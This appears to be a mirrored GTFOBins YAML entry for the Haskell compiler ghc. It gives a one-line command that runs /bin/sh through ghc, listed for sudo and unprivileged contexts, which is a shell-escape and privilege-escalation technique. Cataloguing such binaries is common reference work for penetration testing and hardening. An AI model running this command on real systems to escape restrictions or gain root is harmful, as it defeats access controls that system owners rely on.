mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-08 12:14:13 +02:00
10 lines
139 B
Plaintext
10 lines
139 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
ghc -e 'System.Process.callCommand "/bin/sh"'
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|